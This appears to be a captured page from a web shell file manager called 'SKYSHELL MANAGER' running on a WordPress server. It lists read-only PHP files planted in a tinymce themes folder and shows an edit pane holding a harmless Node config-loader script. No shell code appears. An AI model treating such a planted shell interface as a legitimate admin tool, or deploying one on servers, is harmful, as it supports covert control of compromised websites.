📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: load-nyc-config-sync.js
#!/usr/bin/env node 'use strict'; const { loadNycConfig } = require('@istanbuljs/load-nyc-config'); async function main() { const [cwd, nycrcPath] = process.argv.slice(2); console.log(JSON.stringify(await loadNycConfig({ cwd, nycrcPath }))); } main().catch(error => { console.log(JSON.stringify({ 'load-nyc-config-sync-error': error.message })); });
Save